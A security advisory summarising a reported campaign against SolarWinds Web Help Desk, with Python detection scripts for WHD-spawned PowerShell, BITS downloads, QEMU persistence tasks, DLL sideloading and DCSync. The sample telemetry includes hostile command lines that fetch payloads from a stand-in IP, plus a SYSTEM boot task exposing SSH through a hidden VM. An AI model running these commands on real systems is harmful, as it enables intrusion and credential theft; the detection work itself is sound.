SolarWinds WHD Under Active Attack


Microsoft observed active, in-the-wild exploitation of internet-exposed SolarWinds Web Help Desk (WHD) instances beginning in December 2025. Attackers exploited unpatched vulnerabilities to obtain unauthenticated remote code execution (RCE), then moved laterally and escalated privileges, in some cases to full domain compromise. The campaign underscores the risk of exposing enterprise management applications to the internet and the continued effectiveness of living-off-the-land (LotL) techniques.

Severity: High

Threat Details

1. Initial Access and Vulnerabilities Exploited

Attackers exploited public-facing WHD servers using vulnerabilities including:

  • CVE-2025-40551 – Critical untrusted data deserialization leading to RCE
  • CVE-2025-40536 – Security control bypass
  • CVE-2025-26399 – Previously disclosed WHD vulnerability

Because the observed compromises occurred on systems vulnerable to both older and newer CVEs, Microsoft could not definitively attribute initial access to a single flaw.

2. Post-Exploitation Activity

After compromising WHD, attackers:

  • Spawned PowerShell processes from the WHD service
  • Used BITS (Background Intelligent Transfer Service) to download and execute additional payloads
  • Installed ManageEngine (Zoho) RMM components (e.g., ToolsIQ.exe) to maintain interactive control and persistent access

This use of legitimate tooling reflects a living-off-the-land (LotL) strategy designed to evade traditional signature-based detections.
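The process chain in this section (WHD service process, then PowerShell, then a BITS download, then an RMM binary) is exactly what process-creation logging should surface. The Python below is an added example written for this advisory, not code from Microsoft's report or from SolarWinds: it walks constructed Sysmon-style process-creation events, rebuilds each process's parent chain, and tags PowerShell spawned directly by WHD, BITS transfers anywhere in the WHD process tree, and the ToolsIQ.exe artifact. The WHD install directory, the Java service binary and the 203.0.113.5 address are assumptions for illustration.

```python
"""Tag WHD-spawned PowerShell, BITS payload delivery and the RMM artifact in process telemetry.

Added example for this advisory, not code from Microsoft's report or SolarWinds.
Events are constructed to resemble Sysmon Event ID 1 fields; the WHD install path,
the Java service binary and the 203.0.113.5 address are assumptions.
"""
import re

# Assumption: the WHD service process lives under the product install directory.
# Matching the directory avoids depending on the exact Java binary name or version.
WHD_DIR = re.compile(r"\\webhelpdesk\\", re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# bitsadmin /transfer and the Start-BitsTransfer cmdlet are the usual ways to
# drive BITS from a command line.
BITS = re.compile(r"bitsadmin(?:\.exe)?\s+/transfer|start-bitstransfer", re.IGNORECASE)
# ManageEngine RMM component named in the report as dropped post-compromise.
RMM_WATCHLIST = {"toolsiq.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event, by_pid):
    """Yield parent events by following ParentProcessId; stops at a gap or a loop."""
    seen = set()
    pid = event["ParentProcessId"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        parent = by_pid[pid]
        yield parent
        pid = parent["ParentProcessId"]


def in_whd_tree(event, by_pid):
    """True when any ancestor's image sits under the WHD install directory."""
    return any(WHD_DIR.search(a["Image"]) for a in ancestors(event, by_pid))


def classify(event, by_pid):
    """Return the finding tags for one process-creation event."""
    findings = []
    image = basename(event["Image"])
    whd_tree = in_whd_tree(event, by_pid)
    if image in POWERSHELL and WHD_DIR.search(event["ParentImage"]):
        findings.append("whd_spawned_powershell")
    if BITS.search(event["CommandLine"]):
        findings.append("bits_transfer_from_whd_tree" if whd_tree else "bits_transfer")
    if image in RMM_WATCHLIST:
        findings.append("rmm_artifact_from_whd_tree" if whd_tree else "rmm_artifact")
    return findings


def scan(events):
    """Map ProcessId -> findings for every event that produced at least one."""
    by_pid = {e["ProcessId"]: e for e in events}
    return {e["ProcessId"]: tags for e in events if (tags := classify(e, by_pid))}


# Constructed sample: one WHD-rooted chain plus a benign admin PowerShell session.
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "ParentProcessId": 800,
     "Image": r"C:\Program Files\WebHelpDesk\jre\bin\java.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "java.exe -jar whd.jar", "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessId": 5200, "ParentProcessId": 4100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WebHelpDesk\jre\bin\java.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c Start-BitsTransfer "
                    "-Source http://203.0.113.5/u.bin -Destination C:\\Users\\Public\\u.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessId": 5300, "ParentProcessId": 5200,
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "bitsadmin /transfer j /download /priority foreground "
                    "http://203.0.113.5/t.exe C:\\Users\\Public\\ToolsIQ.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessId": 5400, "ParentProcessId": 5200,
     "Image": r"C:\Users\Public\ToolsIQ.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "ToolsIQ.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessId": 6000, "ParentProcessId": 900,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-Service", "User": r"CORP\helpdesk1"},
]

if __name__ == "__main__":
    for pid, tags in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(tags))
```

Matching the parent directory rather than a binary name keeps the rule stable across WHD upgrades; tune WHD_DIR to the install path in your environment. Treat a bare bits_transfer tag (no _from_whd_tree suffix) as lower confidence, since Windows Update and software deployment tools use BITS routinely; the suffix form is the one worth paging on.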

3. Lateral Movement and Persistence

The attackers demonstrated deliberate and stealthy movement inside victim environments:

  • Domain reconnaissance, including enumeration of privileged users and groups such as Domain Admins
  • Establishment of reverse SSH shells, SSH tunneling, and RDP sessions for lateral movement
  • Creation of scheduled tasks that launched a QEMU virtual machine under the SYSTEM account at startup, effectively hiding attacker activity inside a virtualized environment while exposing SSH access via port forwarding.
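Exported scheduled tasks are a quick way to hunt for the QEMU persistence described above. The Python below is an added example, not code from Microsoft's report or from SolarWinds: it parses Task Scheduler XML (the format schtasks /query /xml and Export-ScheduledTask produce) and reports whether a task runs as SYSTEM (S-1-5-18), starts at boot or logon, launches a qemu-system-* binary, and forwards a host port into the guest's SSH port through QEMU's user-mode networking hostfwd= option. Both task definitions are constructed for the example; the paths and port numbers are assumptions.

```python
"""Flag a scheduled task that boots a QEMU guest as SYSTEM with SSH forwarded into it.

Added example for this advisory, not code from Microsoft's report or SolarWinds.
The two task definitions are constructed; file paths and port numbers are assumptions.
Real exports carry a UTF-16 XML declaration, omitted here so the text parses directly.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_SID = "S-1-5-18"
QEMU_BINARY = re.compile(r"qemu-system-[\w-]+\.exe$", re.IGNORECASE)
# QEMU user-mode networking: hostfwd=tcp:[hostaddr]:hostport-[guestaddr]:guestport
HOSTFWD = re.compile(r"hostfwd=tcp:([^:,]*):(\d+)-([^:,]*):(\d+)", re.IGNORECASE)
STARTUP_TRIGGERS = {"BootTrigger", "LogonTrigger"}


def analyze_task(xml_text):
    """Summarise who runs the task, when it fires, and what its Exec actions launch."""
    root = ET.fromstring(xml_text)
    user_id = root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=NS)
    triggers = set()
    triggers_el = root.find("t:Triggers", NS)
    if triggers_el is not None:
        # Tags come back namespace-qualified as {uri}BootTrigger; keep the local name.
        triggers = {child.tag.split("}", 1)[-1] for child in triggers_el}
    qemu_commands, forwards = [], []
    for exec_el in root.findall("t:Actions/t:Exec", NS):
        command = exec_el.findtext("t:Command", default="", namespaces=NS).strip()
        args = exec_el.findtext("t:Arguments", default="", namespaces=NS)
        if QEMU_BINARY.search(command):
            qemu_commands.append(command)
            for _host, host_port, _guest, guest_port in HOSTFWD.findall(args):
                forwards.append((int(host_port), int(guest_port)))
    report = {
        "runs_as_system": user_id.strip().upper() == SYSTEM_SID,
        "startup_trigger": bool(triggers & STARTUP_TRIGGERS),
        "qemu_commands": qemu_commands,
        "ssh_forwards": [f for f in forwards if f[1] == 22],
        "other_forwards": [f for f in forwards if f[1] != 22],
    }
    report["suspicious"] = (bool(qemu_commands) and report["runs_as_system"]
                            and report["startup_trigger"])
    return report


# Constructed task mirroring the behaviour in the report: SYSTEM, at boot, QEMU guest
# with host port 2222 mapped to the guest's SSH port and 3390 to its RDP port.
SUSPICIOUS_TASK_XML = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Principals>
    <Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\ProgramData\qemu\qemu-system-x86_64.exe</Command>
      <Arguments>-m 2048 -hda C:\ProgramData\qemu\disk.qcow2 -netdev user,id=n0,hostfwd=tcp::2222-:22,hostfwd=tcp::3390-:3389 -device e1000,netdev=n0 -display none</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Constructed benign task: also SYSTEM at boot, but a log-rotation script, not a VM.
BENIGN_TASK_XML = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>
  <Actions Context="Author">
    <Exec><Command>C:\Windows\System32\cmd.exe</Command><Arguments>/c C:\Scripts\rotate-logs.cmd</Arguments></Exec>
  </Actions>
</Task>
"""

if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(name, analyze_task(xml_text))
```

Run it over every task exported from a host (one XML per task) and review anything with suspicious set, then the ssh_forwards list tells you which host port the attacker's SSH service was reachable on. A QEMU binary under ProgramData, Users\Public or a temp directory is itself worth a look even without the SYSTEM and boot conditions.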

4. Credential Access and Privilege Escalation

  • DLL sideloading via wab.exe to load a malicious sspicli.dll, enabling LSASS credential theft while evading detection.
  • In at least one case, attackers escalated to DCSync, replicating Active Directory credential material (including password hashes) from a domain controller.
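Two signals from this section are cheap to check in existing telemetry: wab.exe loading sspicli.dll from anywhere other than System32 (or wab.exe itself running outside its Windows Mail directory, which is what a copied-and-sideloaded binary looks like), and a non-domain-controller account requesting the directory-replication extended rights that a DCSync request exercises. The Python below is an added example, not code from Microsoft's report or from SolarWinds; the image-load and 4662-style events are constructed, and the DC01$/DC02$ allowlist and the svc_whd account name are assumptions.

```python
"""Flag sspicli.dll sideloading into wab.exe and DCSync-style replication requests.

Added example for this advisory, not code from Microsoft's report or SolarWinds.
Samples are constructed: one batch shaped like Sysmon Event ID 7 (image load), one
shaped like Windows Security Event ID 4662 (operation on a directory object).
Account and host names are assumptions.
"""
import ntpath

SYSTEM_DLL_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
WAB_DIRS = {r"c:\program files\windows mail", r"c:\program files (x86)\windows mail"}

# Extended rights an account exercises when it pulls directory changes the way a
# domain controller does; these are what a DCSync request shows up as in 4662.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Assumption: only the DCs' machine accounts replicate in this environment. Add any
# legitimate directory-sync service account your environment runs.
REPLICATION_ALLOWLIST = {"DC01$", "DC02$"}


def _dir_of(path):
    return ntpath.dirname(path).lower()


def check_image_load(event):
    """Return finding tags for an image-load event with Image and ImageLoaded fields."""
    findings = []
    image, loaded = event["Image"], event["ImageLoaded"]
    if ntpath.basename(image).lower() != "wab.exe":
        return findings
    if _dir_of(image) not in WAB_DIRS:
        findings.append("wab_relocated")
    if (ntpath.basename(loaded).lower() == "sspicli.dll"
            and _dir_of(loaded) not in SYSTEM_DLL_DIRS):
        findings.append("sspicli_sideload")
    return findings


def check_directory_access(event):
    """Return the replication rights a non-allowlisted account requested in a 4662 event."""
    if event.get("EventID") != 4662:
        return []
    props = event.get("Properties", "").lower()
    rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
    if not rights or event["SubjectUserName"] in REPLICATION_ALLOWLIST:
        return []
    return rights


# Constructed image-load events: legitimate wab.exe, a relocated copy with a
# sideloaded DLL, and LSASS loading the real sspicli.dll (normal).
IMAGE_LOADS = [
    {"Image": r"C:\Program Files\Windows Mail\wab.exe",
     "ImageLoaded": r"C:\Windows\System32\sspicli.dll"},
    {"Image": r"C:\Users\Public\wab.exe",
     "ImageLoaded": r"C:\Users\Public\sspicli.dll"},
    {"Image": r"C:\Windows\System32\lsass.exe",
     "ImageLoaded": r"C:\Windows\System32\sspicli.dll"},
]

# Constructed 4662 events: normal DC-to-DC replication, a service account asking for
# replication rights, and an unrelated object read by the same account.
DIRECTORY_ACCESS = [
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "svc_whd",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "svc_whd",
     "Properties": "%%7688 {bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for ev in IMAGE_LOADS:
        print(ev["Image"], check_image_load(ev))
    for ev in DIRECTORY_ACCESS:
        print(ev["SubjectUserName"], check_directory_access(ev))
```

The replication allowlist must be complete: every domain controller's machine account, plus any directory synchronisation service your environment legitimately runs. Anything else requesting Get-Changes-All is a DCSync attempt until proven otherwise, and the image-load check should fire on the very first wab.exe launch from a user-writable directory, before any LSASS access happens.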

Recommendations

  1. Immediately patch SolarWinds Web Help Desk to address CVE-2025-40551, CVE-2025-40536 and CVE-2025-26399.
  2. Remove public access to WHD admin paths.
  3. Increase logging and monitoring on WHD components (e.g., Ajax Proxy).
  4. Hunt for and remove unauthorized ManageEngine RMM artifacts introduced post-compromise.
  5. Rotate credentials immediately after suspected or confirmed compromise, prioritizing:
    • WHD service accounts
    • Domain Admin and privileged accounts reachable from WHD
  6. Monitor and alert on DCSync attempts, anomalous directory replication requests, and abnormal privileged group enumeration.
  7. Block or alert on WHD spawning PowerShell and abuse of BITS for payload delivery.
  8. Enable LSA protection (RunAsPPL) and Credential Guard where supported, so that unprotected processes cannot read LSASS memory.

Source:

  • https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/


Ampcus Cyber